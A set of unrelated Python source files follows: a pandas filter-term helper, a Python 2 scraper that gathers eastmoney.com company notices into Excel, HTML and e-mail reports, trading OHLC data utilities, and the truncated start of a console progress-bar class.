    # str(node) looks like "/path/to/node (Kind) ..."; the name is the last
    # path component of the first whitespace-separated token.
    node_path = str(node).split()[0]
    return node_path.split('/')[-1]
def _get_valid_filter_terms(filter_terms, colnames):
    """Remove filter terms that reference non-existent columns.

    Parameters
    ----------
    filter_terms
        A list of terms formatted so as to be used in the `where` argument of
        :func:`pd.read_hdf`.
    colnames :
        A list of column names present in the data that will be filtered.

    Returns
    -------
    The list of valid filter terms (terms that do not reference any column
    not existing in the data). Returns None if the list is empty because
    the `where` argument doesn't like empty lists.
    """
    if not filter_terms:
        return None
    valid_terms = filter_terms.copy()
    for term in filter_terms:
        # Strip parentheses first -- the `where` in read_hdf requires every
        # referenced name to be valid, so only the bare conditions matter.
        # (Raw strings used for the regexes: '\s' in a plain literal is an
        # invalid escape on modern Python.)
        conditions = re.split(r'[&|]', re.sub(r'[()]', '', term))
        # The column referenced by each condition is its leading token.
        term_columns = {re.split(r'[<=>\s]', condition.strip())[0]
                        for condition in conditions}
        if not term_columns.issubset(colnames):
            valid_terms.remove(term)
    return valid_terms if valid_terms else None
|
# *-* coding: utf-8 *-*
# 抓取东方财富上的上市公司公告
# http://data.eastmoney.com/notices/
# 代码版本 python 2.7 IDE:PyCharm
import requests
from random import random
import json
import xlrd
import xlwt
import time
import math
import urllib
from email.mime.text import MIMEText
from email.mime.multipart import MIMEMultipart
from email.header import Header
import smtplib
import base64
import codecs
import ConfigParser
import logging
# Module-level logger; handlers are attached later in init_log().
logger = logging.getLogger()
baseurl = "http://data.eastmoney.com"
# Notice-list jsonp endpoint; placeholders: CodeType, PageIndex, jsObj
# callback name, rt (30-second time bucket from getRightTime()).
apiurl = "http://data.eastmoney.com/notices/getdata.ashx?StockCode=&FirstNodeType=0&CodeType=%s&PageIndex=%s&PageSize=1000&jsObj=%s&SecNodeType=0&Time=&rt=%s"
# 1 = A-share notices (keep today's); 2 = NEEQ notices (keep yesterday's).
# See time_compare() for how this changes the date cutoff.
noticeCate = 1
name = "eastmoneynotice"
path = "D:\\crawl\\eastmoney"
# Market boards to crawl: "code" is a short id, "name" the display name,
# "codeType" the API parameter value.
plateDic = [
    {
        "code": "hsa",
        "name": "沪深A股",
        "codeType": "1",
    },
    {
        "code": "zxb",
        "name": "中小板",
        "codeType": "4",
    },
    {
        "code": "cyb",
        "name": "创业板",
        "codeType": "5",
    }
]
# User-Agent pool; one is picked at random per request to look like a browser.
user_agent_list = [
    "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/22.0.1207.1 Safari/537.1",
    "Mozilla/5.0 (X11; CrOS i686 2268.111.0) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.57 Safari/536.11",
    "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.6 (KHTML, like Gecko) Chrome/20.0.1092.0 Safari/536.6",
    "Mozilla/5.0 (Windows NT 6.2) AppleWebKit/536.6 (KHTML, like Gecko) Chrome/20.0.1090.0 Safari/536.6",
    "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/19.77.34.5 Safari/537.1",
    "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.9 Safari/536.5",
    "Mozilla/5.0 (Windows NT 6.0) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.36 Safari/536.5",
    "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1063.0 Safari/536.3",
    "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1063.0 Safari/536.3",
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_0) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1063.0 Safari/536.3",
    "Mozilla/5.0 (Windows NT 6.2) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1062.0 Safari/536.3",
    "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1062.0 Safari/536.3",
    "Mozilla/5.0 (Windows NT 6.2) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1061.1 Safari/536.3",
    "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1061.1 Safari/536.3",
    "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1061.1 Safari/536.3",
    "Mozilla/5.0 (Windows NT 6.2) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1061.0 Safari/536.3",
    "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/535.24 (KHTML, like Gecko) Chrome/19.0.1055.1 Safari/535.24",
    "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.24 (KHTML, like Gecko) Chrome/19.0.1055.1 Safari/535.24"
]
def download_get_html(url, charset="utf-8", timeout=10, num_retries=3):
    """Fetch `url` and return the decoded response body, or None.

    Retries up to `num_retries` times, 10 seconds apart, on any request
    failure. Returns None on a 404 or after all retries are exhausted.
    """
    # BUG FIX: this module does `from random import random`, so `random` is
    # the function, not the module -- random.choice() raised AttributeError.
    # Pick a User-Agent by index using the imported random() instead.
    UA = user_agent_list[int(random() * len(user_agent_list))]
    headers = {
        'User-Agent': UA,
        'Content-Type': 'text/html; charset=' + charset
    }
    try:
        response = requests.get(url, headers=headers,
                                timeout=timeout)
        # Decode the body with the caller-provided charset.
        response.encoding = charset
        # Treat 404 as "no data" rather than an error worth retrying.
        if response.status_code == 404:
            logger.debug('get 404: %s ', url)
            return None
        else:
            logger.debug('get : %s ', url)
            return response.text
    except Exception:  # narrowed from bare except so Ctrl-C still works
        if num_retries > 0:
            time.sleep(10)
            logger.debug('正在尝试,10S后将重新获取倒数第 %d 次', num_retries)
            return download_get_html(url, charset, timeout, num_retries - 1)
        else:
            logger.debug('尝试也不好使了!取消访问')
            return None
# Open an excel workbook with xlrd.
def open_excel(file='file.xls'):
    """Open the workbook at `file`.

    Returns the xlrd Book object, or implicitly None if opening raised
    (the exception text is logged).
    """
    try:
        data = xlrd.open_workbook(file)
        return data
    except Exception, e:
        logger.debug(str(e))
# Analyze the crawled excel data and count notices per category.
def analyze_excel(fileName):
    """Summarize `fileName` into a new workbook "汇总.xls".

    For every sheet (one per market board) the notices are counted per
    notice type and written as rows of a summary sheet, with the board
    name written into a merged cell spanning its rows.
    """
    file = open_excel(fileName)
    workbook = xlwt.Workbook(encoding='utf-8')
    wsb = workbook.add_sheet("汇总")
    wsb.write(0, 0, label="板块")
    wsb.write(0, 1, label="公告类型")
    wsb.write(0, 2, label="数量")
    alignment = xlwt.Alignment()  # Create Alignment
    # May be: HORZ_GENERAL, HORZ_LEFT, HORZ_CENTER, HORZ_RIGHT,
    # HORZ_FILLED, HORZ_JUSTIFIED, HORZ_CENTER_ACROSS_SEL, HORZ_DISTRIBUTED
    alignment.horz = xlwt.Alignment.HORZ_CENTER  # center horizontally
    # May be: VERT_TOP, VERT_CENTER, VERT_BOTTOM, VERT_JUSTIFIED,
    # VERT_DISTRIBUTED
    alignment.vert = xlwt.Alignment.VERT_CENTER  # center vertically
    style = xlwt.XFStyle()  # Create Style
    style.alignment = alignment  # Add Alignment to Style
    # x tracks the next free row in the summary sheet across all boards.
    x = 1
    for worksheet in file.sheets():
        nrows = worksheet.nrows  # number of rows
        ncols = worksheet.ncols  # number of columns
        # Count notices per notice type (column 3 of each data row).
        docs = {}
        for rownum in range(1, nrows):
            row = worksheet.row_values(rownum)
            dataType = row[3]
            if dataType in docs:
                docs[dataType] = docs[dataType] + 1
            else:
                docs[dataType] = 1
        for name in docs:
            print worksheet.name, name, docs[name]
            # TODO sheet.write_merge(0, 0, 0, 1, 'Long Cell')
            # wsb.write(x, 0, label = worksheet.name)
            wsb.write(x, 1, label=name)
            wsb.write(x, 2, label=docs[name])
            x = x + 1
        print x, len(docs)
        # Label the board: a single cell when there were no notices, else a
        # merged cell spanning this board's rows.
        if len(docs) == 0:
            wsb.write(x, 0, worksheet.name.encode("utf-8"), style)
        else:
            wsb.write_merge(x - len(docs), x - 1, 0, 0,
                            worksheet.name.encode("utf-8"), style)
        print "-------"
    workbook.save(u"汇总.xls")
# Port of getCode from the site's load_table_data.js (jsonp callback token).
def getCode(num=6):
    """Return a random string of `num` ASCII letters."""
    letters = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
    picked = []
    for _ in range(0, num):
        # random() is the function imported at module level; 52 letters total.
        picked.append(letters[int(math.floor(random() * 52))])
    return "".join(picked)
# JS equivalent: parseInt(parseInt(new Date().getTime()) / 30000)
def getRightTime():
    """Return the current time bucketed into 30-second intervals."""
    return int(time.time() / 30)
def getUrl(url, codetype, page, code, rt):
    """Fill the api url template with code type, page, jsonp token and rt."""
    params = (codetype, page, code, rt)
    return url % params
def parser_data(data):
    """Parse one raw notice record from the API into a row list.

    Returns [code, name, title, typeName, detailLink, date] when the
    notice date passes time_compare(), else None.
    """
    temp = data["CDSY_SECUCODES"][0]
    noteicedate = data["NOTICEDATE"]
    # NOTICEDATE looks like "YYYY-MM-DDT..."; keep only the date part.
    date = noteicedate[0:noteicedate.index('T')]
    code = temp["SECURITYCODE"]
    name = temp["SECURITYSHORTNAME"]
    title = data["NOTICETITLE"]
    typeName = '公司公告'
    if data["ANN_RELCOLUMNS"] and len(data["ANN_RELCOLUMNS"]) > 0:
        typeName = data["ANN_RELCOLUMNS"][0]["COLUMNNAME"]
    # Python 2: encode the short name, url-quote it and base64-encode it into
    # the detail-page link, mirroring the site's own url scheme.
    namestr = unicode(name).encode("utf-8")
    detailLink = baseurl + '/notices/detail/' + code + '/' + \
        data["INFOCODE"] + ',' + \
        base64.b64encode(urllib.quote(namestr)) + '.html'
    # print date,code,name,title,typeName,detailLink
    if time_compare(date):
        return [code, name, title, typeName, detailLink, date]
    else:
        return None
def time_compare(notice_date):
    """Return True when `notice_date` (YYYY-MM-DD) is on/after the cutoff day.

    The cutoff is today's local midnight for A-share notices
    (noticeCate == 1) and yesterday's local midnight otherwise.
    """
    # Timestamp of the notice's date.
    notice_ticks = time.mktime(time.strptime(notice_date, "%Y-%m-%d"))
    if noticeCate == 1:
        # A-share notices: compare against today (local midnight).
        cutoff_day = time.strftime("%Y-%m-%d", time.localtime(time.time()))
    else:
        # NEEQ notices: compare against yesterday (local midnight).
        cutoff_day = time.strftime(
            "%Y-%m-%d", time.localtime(time.time() - 60 * 60 * 24))
    cutoff_struct = time.strptime(cutoff_day, "%Y-%m-%d")
    cutoff_ticks = time.mktime(cutoff_struct)
    # ">=" so Monday's run still keeps the cutoff day itself.
    return notice_ticks >= cutoff_ticks
def do_notice(notices, plate):
    """Crawl notice pages for `plate`, appending parsed rows to `notices`.

    Pages are fetched until a notice falls outside the wanted date window
    (parser_data returns None) or a page fails to download. Mutates
    `notices` in place.
    """
    for page in xrange(1, 10):
        rt = getRightTime()
        code = getCode(8)
        url = getUrl(apiurl, plate["codeType"], page, code, rt)
        jsdata = download_get_html(url)
        if jsdata is not None:
            # Strip the jsonp callback wrapper to get the raw json payload.
            json_str = jsdata[15:-1]
            datas = json.loads(json_str)["data"]
            for data in datas:
                # parser_data filters by notice date; None marks the first
                # notice older than the cutoff.
                notice = parser_data(data)
                if notice is not None:
                    notices.append(notice)
                else:
                    # BUG FIX: was '"..." & (...)' which raises TypeError;
                    # string formatting needs the % operator.
                    logger.debug("page end notices %s %d" % (plate["name"], len(notices)))
                    return
        else:
            # BUG FIX: same '&' -> '%' formatting error as above.
            logger.debug("no notices %s %d" % (plate["name"], len(notices)))
            return
# Write one board's notices into a new sheet of the workbook.
def write_sheet(workbook, sheetName, rows):
    """Add sheet `sheetName` to `workbook` and fill it with notice `rows`.

    The title column (index 2) is written as a clickable hyperlink to the
    notice detail page (row[4]).
    """
    worksheet = workbook.add_sheet(sheetName)
    worksheet.write(0, 0, label="代码")
    worksheet.write(0, 1, label="名称")
    worksheet.write(0, 2, label="公告标题")
    worksheet.write(0, 3, label="公告类型")
    out_row = 1
    for row in rows:
        for col in range(0, 4):
            if col == 2:
                alink = 'HYPERLINK("%s";"%s")' % (row[4], row[2])
                worksheet.write(out_row, col, xlwt.Formula(alink))
            else:
                worksheet.write(out_row, col, row[col])
        out_row += 1
def render_mail(name, rows):
    """Render the html mail fragment for one board.

    Produces an <h2> header plus a table with one row per notice; the
    title cell links to the notice detail page.
    """
    html_mail = ""
    # Table header; %s is the board display name.
    header_tpl = """
    <h2>%s</h2>
    <table>
    <thead>
    <tr>
    <th style="width: 60px; padding: 0px;text-align:center">代码</th>
    <th style="width: 110px; padding: 0px;text-align:center">名称</th>
    <th style="width: 385px; padding: 0px;text-align:center">公告标题</th>
    <th style="width: 110px; padding: 0px;text-align:center">公告类型</th>
    <th style="width: 80px; padding: 0px;text-align:center">公告日期</th>
    </tr>
    </thead>
    <tbody>
    """
    html_mail = html_mail + header_tpl % (name)
    # Row template: code, name, link href, link title, link text, type, date.
    tr_tpl = """
    <tr>
    <td style="text-align:center">
    %s
    </td>
    <td style="text-align:center">
    %s
    </td>
    <td>
    <a style="text-align:left;width:350px" href="%s" title="%s">%s</a>
    </td>
    <td style="text-align:center">
    %s
    </td>
    <td style="text-align:center">
    %s
    </td>
    </tr>
    """
    for row in rows:
        trs = tr_tpl % (unicode(row[0]).encode("utf-8"), unicode(row[1]).encode("utf-8"), unicode(row[4]).encode("utf-8"), unicode(
            row[2]).encode("utf-8"), unicode(row[2]).encode("utf-8"), unicode(row[3]).encode("utf-8"), unicode(row[5]).encode("utf-8"))
        html_mail = html_mail + trs
    footer = "</tbody></table>"
    html_mail = html_mail + footer
    return html_mail
def write_html(now, html):
    """Append `html` (a utf-8 byte string) to the dated html report file.

    The file name is "<name>-<now>.html" in the working directory.
    """
    # FIX: use a with-block so the handle is closed even if the write fails
    # (the original left the file open on error).
    with codecs.open(name + "-" + now + '.html', 'a', 'utf-8') as f:
        f.write(unicode(html, "utf-8"))
def read_html(now):
    """Read back the dated html report file and return it as unicode."""
    ipath = name + "-" + now + '.html'
    # FIX: with-block closes the handle on error, and joining decoded lines
    # avoids the quadratic repeated string concatenation of the original.
    with open(ipath) as f:
        return "".join(text.decode('utf-8') for text in f)
def send_notice_mail(fileName, now):
    """Send the daily notice mail: html body plus the xls workbook attached.

    SMTP settings and the recipient list are read from notice_montage.ini.
    """
    cf = get_config_parser()
    to_list = cf.get("mailconf", "to_list").split(",")
    mail_host = cf.get("mailconf", "mail_host")
    mail_username = cf.get("mailconf", "mail_username")
    mail_user = cf.get("mailconf", "mail_user")
    mail_pass = cf.get("mailconf", "mail_pass")
    mail_postfix = cf.get("mailconf", "mail_postfix")
    me = "AStockMarketNoticeWatcher" + "<" + \
        mail_username + "@" + mail_postfix + ">"
    msg = MIMEMultipart()
    subject = now + ' 日 - 二级市场公告信息每日更新'
    msg['Subject'] = Header(subject, 'utf-8')
    msg['From'] = me
    msg['To'] = ";".join(to_list)
    mail_msg = read_html(now)
    # Mail body: the day's rendered html report.
    # msg.attach(MIMEText(now+" 日,二级市场公告信息。详情请见附件excel", 'plain', 'utf-8'))
    msg.attach(MIMEText(mail_msg, 'html', 'utf-8'))
    # Attachment: the xls workbook from the current directory.
    att2 = MIMEText(open(fileName, 'rb').read(), 'base64', 'utf-8')
    att2["Content-Type"] = 'application/octet-stream'
    # RFC 2047-encode the filename so non-ASCII names survive download.
    att2.add_header('Content-Disposition', 'attachment', filename='=?utf-8?b?' +
                    base64.b64encode(fileName.encode('UTF-8')) + '?=')
    msg.attach(att2)
    try:
        server = smtplib.SMTP()
        server.connect(mail_host)
        server.ehlo()
        server.starttls()
        server.login(mail_user, mail_pass)
        server.sendmail(me, to_list, msg.as_string())
        server.close()
        logger.debug('sent mail successfully')
    except smtplib.SMTPException, e:
        # Reference: http://www.cnblogs.com/klchang/p/4635040.html
        # NOTE(review): logger.debug gets a second positional arg but the
        # message has no %s placeholder -- logging will raise a formatting
        # error; should be logger.debug('...: %s', repr(e)).
        logger.debug('Error: 无法发送邮件', repr(e))
def get_config_parser():
    """Return a ConfigParser loaded from notice_montage.ini (cwd-relative)."""
    parser = ConfigParser.ConfigParser()
    # read() silently skips a missing file; callers then see empty sections.
    parser.read("notice_montage.ini")
    return parser
# Parse the ini configuration into module-level globals.
def init_config():
    """Populate the DEBUG, INTERVAL and WEBSITE globals from the ini file."""
    global DEBUG, INTERVAL, WEBSITE
    conf = get_config_parser()
    INTERVAL = int(conf.get("timeconf", "interval"))
    # Config values are strings; compare against the literal 'True'.
    DEBUG = conf.get("urlconf", "debug") == 'True'
    WEBSITE = conf.get("urlconf", "website")
def init_log():
    """Attach a stream (debug) or file handler to the module logger."""
    if DEBUG:
        # Debug runs log to the console.
        handler = logging.StreamHandler()
    else:
        # Production runs log to a file for later inspection.
        handler = logging.FileHandler("notice_montage.log")
    log_format = logging.Formatter(
        '%(asctime)s %(name)-12s %(levelname)-8s %(message)s')
    handler.setFormatter(log_format)
    logger.addHandler(handler)
    logger.setLevel(logging.DEBUG)
def main(fileName, now):
    """Crawl every board in plateDic and emit the xls workbook + html report.

    For each board, the notices are fetched, written as a worksheet and
    rendered into the daily html file; finally the workbook is saved.
    """
    # FIX: declare the global once instead of duplicating the declaration
    # in both branches of the board check.
    global noticeCate
    workbook = xlwt.Workbook(encoding='utf-8')
    for plate in plateDic:
        # NEEQ board ("sb") keeps yesterday's notices; A-share boards today's.
        noticeCate = 2 if plate["code"] == "sb" else 1
        notices = []
        do_notice(notices, plate)
        if len(notices) > 0:
            write_sheet(workbook, plate["name"], notices)
            html = render_mail(plate["name"], notices)
            write_html(now, html)
    workbook.save(fileName)
    # send_notice_mail(fileName, now)
def run(fileName, now, num_retries=3):
    """Run main(), retrying up to `num_retries` times (10s apart) on failure."""
    try:
        main(fileName, now)
    except Exception as e:
        logger.debug(str(e))
        if num_retries > 0:
            time.sleep(10)
            # BUG FIX: logger.debug was called with extra positional args and
            # no format placeholder, which makes logging raise a formatting
            # error; fold the retry count into the message with %d.
            logger.debug('公告抓取正在尝试,10S后将重新获取倒数第 %d 次', num_retries)
            run(fileName, now, num_retries - 1)
        else:
            logger.debug('公告抓取尝试也不好使了!取消运行')
if __name__ == "__main__":
    logger.debug("start")
    # FIX: removed the unused local `num_retries = 3` -- run() already
    # carries its own retry default.
    now = time.strftime("%Y-%m-%d", time.localtime())
    # One dated workbook per day, e.g. gg-2020-01-01.xls.
    fileName = "gg-" + now + ".xls"
    run(fileName, now)
    # analyze_excel(fileName)
    logger.debug("end")
|
import pytz
from datetime import datetime, timedelta
import numpy as np
import pandas as pd
import os
import settings
import time
import random
"""
Convert dates to default format and timezone
"""
def convert_datetime_with_timezone(date, time_zone = settings.DEFAULT_TIME_ZONE, format_date=settings.DEFAULT_FORMAT):
date = datetime.strptime(date, format_date)
timezone = pytz.timezone(time_zone).localize(date)
return timezone
"""
Convert dates to default format and timezone
"""
def convert_datetime(date, format_date=settings.DEFAULT_FORMAT):
date = datetime.strptime(date, format_date)
return date
def get_dataframe(symbol, start, end, type='T', frame=1, sep=';', format_date=settings.DEFAULT_FORMAT, backperiods=20, serie=None):
    """Load OHLCV bars for `symbol` between `start` and `end` from csv storage.

    Reads the base 1Min (intraday) or 1D (daily+) csv for the symbol,
    resamples it to the requested `type`/`frame`, and filters it to the
    date window, extended backwards by `backperiods` warm-up bars via
    get_base_bars().

    NOTE(review): the parameter `type` shadows the builtin; kept for
    interface compatibility.
    """
    assert symbol in settings.SYMBOL_LIST, 'The symbol name is not registered in settings file.'
    assert isinstance(symbol, str)
    assert isinstance(start, str)
    assert isinstance(end, str)
    assert type in settings.FREQUENCY_LIST, "The frequence selected is unknown."
    assert isinstance(frame, int)
    assert isinstance(sep, str)
    assert backperiods > 0, "El parametro backperiods no puede ser igual o menor que cero"
    # Default path, then override with the base resolution the raw csvs use:
    # intraday types read the 1Min file, daily-and-above read the 1D file.
    path = r"{}/{}/{}/{}.csv".format(settings.DATA_DIRECTORY, symbol, "{}{}".format(frame,settings.FREQUENCY_LIST[type]), 'last')
    if type == 'T' or type == 'Min' or type == 'H':
        path = r"{}/{}/{}/{}.csv".format(settings.DATA_DIRECTORY, symbol, "1Min", 'last')
    elif type == 'M' or type == 'W' or type == 'D':
        path = r"{}/{}/{}/{}.csv".format(settings.DATA_DIRECTORY, symbol, "1D", 'last')
    elif type == 'tick':
        pass
    #data = pd.read_csv(path, sep=sep, usecols=['open', 'high', 'low', 'close'], parse_dates=['dateTime'])
    data = pd.read_csv(path, sep=sep, usecols=['dateTime', 'open', 'high', 'low', 'close', 'volume'])
    data['dateTime'] = pd.to_datetime(data['dateTime'], format=format_date)
    # Resample the base bars up to the requested frame.
    if type == 'T' or type == 'Min':
        if frame > 1:
            data = resample_ohlc(data, type, frame)
    elif type == 'H':
        data = resample_ohlc(data, "Min", frame*60)
    elif type == 'D':
        if frame > 1:
            data = resample_ohlc(data, type, frame)
    elif type == 'M':
        data = resample_ohlc(data, type, frame)
    elif type == 'W':
        # NOTE(review): unlike every other branch, this call passes an empty
        # frequency and no frame -- looks like a bug; confirm against
        # resample_ohlc's signature.
        data = resample_ohlc(data, "")
    elif type == 'tick':
        pass
    data = data.dropna(axis=0)
    start_date = convert_datetime(start)
    #start_date = convert_datetime_with_timezone(start)
    #print("Offset: {}".format(start_date))
    # Push the start date back so `backperiods` warm-up bars are included.
    start_date = get_base_bars(serie, start_date, type, frame, backperiods)
    #print("Start Date DF: {}".format(start_date))
    #print("Serie Before Filter")
    #print(data)
    mask = (data['dateTime'] >= start_date.strftime(settings.DEFAULT_FORMAT)) & (data['dateTime'] <= end)
    #return data[start: end]
    data = data.loc[mask]
    data = data.reset_index()
    #print(data)
    return data
def get_commisions(symbol, contracts):
    """The commissions are calculated by entry, per side."""
    per_contract = settings.SYMBOL_LIST[symbol]['commisions']
    return per_contract * contracts
def convert_backperiods_to_time(type, frame, backperiods):
    """Translate a number of lookback bars into a wall-clock timedelta.

    Months are approximated as 30 days. Returns None only for frequency
    codes not handled below (guarded by the assert).
    """
    assert type in settings.FREQUENCY_LIST, "El tipo de temporalidad {}, no esta soportado".format(type)
    assert isinstance(backperiods, int)
    periods = backperiods*frame
    if type in ('T', 'Min'):
        return timedelta(minutes=periods)
    if type == 'H':
        return timedelta(hours=periods)
    if type == 'D':
        return timedelta(days=periods)
    if type == 'M':
        return timedelta(days=periods * 30)
    if type == 'W':
        return timedelta(weeks=periods)
def get_base_bars(serie, current_date, type, frame, backperiods):
    """Find the start date that provides ``backperiods`` bars of history.

    ``serie`` is an availability DataFrame with columns
    ['dateTime', 'min', 'max', 'avaliable'], where 'avaliable' is the
    number of minutes of data present for that day. Starting from the day
    before ``current_date``, the window is widened backwards (in steps of
    ``discount_factor``) until it contains enough available minutes, and
    the first ``dateTime`` of that window (data.iloc[0, 0]) is returned.
    """
    # Gross time requirement implied by the requested number of bars.
    time = 0
    discount_factor = timedelta(days=2)
    if type == 'T' or type == 'Min':
        time = timedelta(minutes=frame * backperiods)
    elif type == 'H':
        time = timedelta(hours=frame * backperiods)
    elif type == 'D':
        time = timedelta(days=frame * backperiods)
        discount_factor = timedelta(days=7)
    elif type == 'M':
        time = timedelta(days=frame * backperiods * 30)
        discount_factor = timedelta(days=30)
    elif type == 'W':
        time = timedelta(weeks=frame * backperiods)
        discount_factor = timedelta(weeks=1)
    # Work with complete days only: exclude the current (possibly partial) day.
    current_date -= timedelta(days=1)
    start_date = current_date - time
    mask = (serie['dateTime'] >= start_date.date()) & (serie['dateTime'] <= current_date.date())
    data = serie.loc[mask]
    data = data.dropna(axis=0)
    # Widen the window backwards until enough minutes of data are available.
    while data['avaliable'].sum() < (time.days * 24 * 60 + time.seconds / 60):
        start_date -= discount_factor
        mask = (serie['dateTime'] >= start_date.date()) & (serie['dateTime'] <= current_date.date())
        data = serie.loc[mask]
        # BUG FIX: drop NaNs from the *filtered* window, not from the whole
        # serie -- the original did ``data = serie.dropna(axis=0)`` here,
        # which discarded the mask, made the loop exit against the full
        # serie's total, and returned the first row of the entire serie.
        data = data.dropna(axis=0)
    return data.iloc[0, 0]
def obtain_ohlc(path, name_price='ask', num_ticks = 34, position=''):
    """Read tick data from ``path`` and build 1-minute OHLC bars.

    Adds log-return columns ('sret', 'sret_high', 'sret_low') computed
    against the previous bar's close, drops NaN rows, and -- when
    ``position`` is 'high' or 'low' -- returns just that column.
    """
    ticks = pd.read_csv(
        path,
        usecols = ['dateTime', name_price],
        na_values = ['nan'],
        parse_dates = True
    )
    # Timestamps are stored as epoch milliseconds.
    ticks["dateTime"] = pd.to_datetime(ticks["dateTime"], unit='ms')
    bars = ticks.set_index('dateTime')[name_price].resample('1Min').ohlc()
    prev_close = bars['close'].shift()
    bars['sret'] = np.log(bars['close'] / prev_close)
    bars['sret_high'] = np.log(bars['high'] / prev_close)
    bars['sret_low'] = np.log(bars['low'] / prev_close)
    # Remove non-numeric rows (first bar has no previous close).
    bars = bars.dropna()
    if position in ('high', 'low'):
        bars = bars[position]
    return bars
def resample_ohlc(df, type='T', frame=60):
    """Resample an OHLCV frame to a coarser time frame.

    Expected input format (as produced by get_dataframe):
        columns dateTime - open - high - low - close - volume,
        with a plain RangeIndex (dateTime is a column, not the index).
    Returns a frame in the same format, bars labelled on the right edge.
    """
    conversion = {'open': 'first', 'high': 'max', 'low': 'min', 'close': 'last', 'volume': 'sum'}
    # BUG FIX: resampling needs a DatetimeIndex; the original called
    # df.resample() directly on the RangeIndex and raised TypeError.
    # Index on dateTime first, then restore it as a column because the
    # callers (see get_dataframe) filter on df['dateTime'] afterwards.
    df = df.set_index('dateTime')
    df = df.resample("{}{}".format(frame, type), label='right').agg(conversion)
    df = df.dropna(axis=0)
    df = df.reset_index()
    return df
def resample_ohlc_tick(df, tick_frame=34):
    """Aggregate tick rows into OHLC bars of ``tick_frame`` ticks each.

    Expects 'dateTime' and 'ask' columns; mutates ``df`` by adding helper
    'count' and 'group' columns. Returns a frame indexed by the last
    dateTime of each group.
    """
    df['count'] = range(1, len(df) + 1)
    df['group'] = np.floor(df['count'] / tick_frame)
    grouped = df.groupby(['group'])
    frame = {
        'dateTime': grouped['dateTime'].last(),
        'open': grouped['ask'].first(),
        'high': grouped['ask'].max(),
        'low': grouped['ask'].min(),
        'close': grouped['ask'].last(),
    }
    bars = pd.DataFrame(frame, columns=['dateTime', 'open', 'high', 'low', 'close'])
    return bars.set_index('dateTime')
def save_tmp(df, symbol, type, frame):
    """Persist a resampled frame under key ``type-frame`` in the symbol's
    HDF5 cache file.
    """
    # BUG FIX: the original used ``settings.DATA_DIRECTORY.join("/x.h5")``,
    # i.e. str.join, which interleaves the directory between the characters
    # of the file name instead of building a path.
    path = "{}/{}.h5".format(settings.DATA_DIRECTORY, symbol)
    data_store = pd.HDFStore(path)
    try:
        data_store["{}-{}".format(type, frame)] = df
    finally:
        # Always release the store, even if the write fails.
        data_store.close()
def load_tmp(symbol, type, frame):
    """Load a cached frame for ``type-frame`` from the symbol's HDF5 file.

    Returns the frame, or None when the key is not present.
    """
    # BUG FIX: same str.join path bug as save_tmp; additionally the
    # original leaked the open HDFStore (and fell off the end, implicitly
    # returning None) when the key was missing.
    path = "{}/{}.h5".format(settings.DATA_DIRECTORY, symbol)
    data_store = pd.HDFStore(path)
    try:
        key = "{}-{}".format(type, frame)
        if key in data_store:
            return data_store[key]
        return None
    finally:
        data_store.close()
def strTimeProp(start, end, format, prop, output_format):
    """Interpolate between two date strings.

    ``prop`` in [0, 1] selects a point proportionally between ``start``
    and ``end`` (parsed with ``format``); the result is rendered with
    ``output_format``.
    """
    t0 = time.mktime(time.strptime(start, format))
    t1 = time.mktime(time.strptime(end, format))
    picked = t0 + prop * (t1 - t0)
    return time.strftime(output_format, time.localtime(picked))
def random_date(start, end, format, output_format="%d/%m/%Y") -> str:
    """Pick a uniformly random business day between ``start`` and ``end``.

    Re-draws until the date is neither a configured holiday nor a weekend.
    Returns the formatted date *string* (the original annotation said
    ``datetime``, but strTimeProp returns a str).
    """
    date = strTimeProp(start, end, format, random.random(), output_format)
    holidays = settings.HOLIDAYS.keys()
    date_obj = datetime.strptime(date, output_format)
    # weekday() > 4 means Saturday/Sunday.
    while (date in holidays or date_obj.weekday() > 4):
        date = strTimeProp(start, end, format, random.random(), output_format)
        date_obj = datetime.strptime(date, output_format)
    return date
|
<gh_stars>0
from __future__ import print_function, division, absolute_import
import sys
import math
import time
import numpy as np
import theano
from matplotlib import pyplot as plt
try:
import seaborn
except:
pass
# ===========================================================================
# Progress bar
# ===========================================================================
class Progbar(object):
    '''
    Console progress bar that also displays running averages of reported
    metric values.

    This function is adpated from: https://github.com/fchollet/keras
    Original work Copyright (c) 2014-2015 keras contributors
    Modified work Copyright 2016-2017 TrungNT
    '''
    def __init__(self, target, title=''):
        '''
        @param target: total number of steps expected
        @param title: text printed before the bar
        '''
        self.width = 39  # character width of the bar itself
        self.target = target
        # metric name -> [weighted sum, total weight] for averaging
        self.sum_values = {}
        # metric names in first-seen order (keeps display order stable)
        self.unique_values = []
        self.start = time.time()
        self.total_width = 0  # width of the previous render, for erasing
        self.seen_so_far = 0
    def update(self, current, values=[]):
        '''
        @param current: index of current step
        @param values: list of tuples (name, value_for_last_step).
            The progress bar will display averages for these values.

        NOTE(review): the mutable default ``values=[]`` is shared across
        calls; it is never mutated here, so harmless but fragile.
        NOTE(review): ``np.log10(self.target)`` below fails for target <= 0.
        '''
        # Accumulate each metric, weighted by the number of steps advanced.
